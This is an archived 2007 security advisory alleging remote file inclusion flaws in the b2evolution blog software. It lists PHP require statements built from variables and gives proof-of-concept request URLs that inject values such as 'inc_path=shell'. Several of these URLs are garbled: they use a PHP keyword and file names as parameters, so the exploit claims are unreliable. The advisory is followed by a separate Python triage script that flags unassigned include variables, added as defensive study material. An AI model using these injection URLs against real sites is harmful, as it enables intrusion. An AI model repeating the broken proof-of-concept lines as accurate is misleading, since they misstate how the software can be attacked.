Remote File Inclusion

2007-04-28T00:00:00
ID SECURITYVULNS:DOC:16868
Type securityvulns
Reporter Securityvulns
Modified 2007-04-28T00:00:00

Description

b2evolution Remote File Inclusion

Affected Software: b2evolution
Download: http://b2evolution.net/
Risk: high
Date: 25/4/2007
Found by: s433d_only_linux
Contact: s433d_only_linux@yahoo.de
Web: Www.hackerz.ir
Special thanks: Ali Jasbi, my best friend

Affected File:

b2evolution\blogs/a_noskin.php  require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/a_stub.php  require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/admin.php  require_once $inc_path.'_main.inc.php';
b2evolution\blogs/admin.php  require $view_path.'errors/_access_denied.inc.php';
b2evolution\blogs/admin.php  require_once $inc_path.'_async.inc.php';
b2evolution\blogs/admin.php  require $control_path.$ctrl_mappings[$ctrl];
b2evolution\blogs/contact.php  require_once $inc_path.'_main.inc.php';
b2evolution\blogs/contact.php  require $skins_path.'_msgform.php';
b2evolution\blogs/default.php  require_once $inc_path.'_main.inc.php';
b2evolution\blogs/index.php  require_once $inc_path.'_main.inc.php';
b2evolution\blogs/index.php  require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/multiblogs.php  require_once $inc_path.'_blog_main.inc.php';
b2evolution\blogs/multiblogs.php  require $skins_path.'_bloglist.php';
b2evolution\blogs/multiblogs.php  require $skins_path.'_feedback.php';

b2evolution\blogs/a_noskin.php?require=shell?
b2evolution\blogs/a_stub.php?_blog_main.inc.php=shell?
b2evolution\blogs/admin.php?inc_path=
b2evolution\blogs/admin.php?errors/_access_denied.inc.php=shell?
b2evolution\blogs/admin.php?inc_path=shell
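A triage check for the require statements listed under Affected File, added here as an example and not taken from the advisory or from b2evolution: it reports every variable used in an include/require path that is not assigned earlier in the same PHP file. The function names, the one-statement-per-line assumption and the sample source are constructed for illustration.

```python
import re

# include/require statement; group 1 is the path expression up to the ';'
INCLUDE_RE = re.compile(
    r"(?<![$\w])(?:require|include)(?:_once)?\b\s*\(?([^;]*);", re.IGNORECASE)
VAR_RE = re.compile(r"\$(\w+)")


def assigned_before(var, earlier_lines):
    """True if $var (or $var[...]) is assigned on any earlier line."""
    pat = re.compile(
        r"\$" + re.escape(var) + r"\b\s*(?:\[[^\]]*\]\s*)*=(?![=>])")
    return any(pat.search(line) for line in earlier_lines)


def audit(source):
    """Return (line_no, variable) for every variable used in an
    include/require path that is not assigned earlier in the same file.
    Assumes each include/require statement sits on a single line."""
    findings = []
    lines = source.splitlines()
    for no, line in enumerate(lines, 1):
        if line.lstrip().startswith(("//", "#", "*")):
            continue  # skip comment lines
        for stmt in INCLUDE_RE.finditer(line):
            for var in VAR_RE.findall(stmt.group(1)):
                if not assigned_before(var, lines[:no - 1]):
                    findings.append((no, var))
    return findings


# Constructed sample, modelled on the statements the advisory lists.
SAMPLE = """<?php
$view_path = dirname(__FILE__).'/views/';
require_once $inc_path.'_main.inc.php';
require $view_path.'errors/_access_denied.inc.php';
require $control_path.$ctrl_mappings[$ctrl];
"""

if __name__ == "__main__":
    for no, var in audit(SAMPLE):
        print(f"line {no}: ${var} is not set in this file before the include")
```

A finding is a candidate for manual review, not a confirmed inclusion flaw: the variable may be set by a configuration file included earlier, and a request parameter can only populate it when PHP's register_globals is enabled.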